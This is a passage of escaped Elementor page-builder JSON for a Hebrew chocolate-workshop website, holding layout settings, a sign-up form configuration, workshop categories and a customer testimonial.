ents\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd 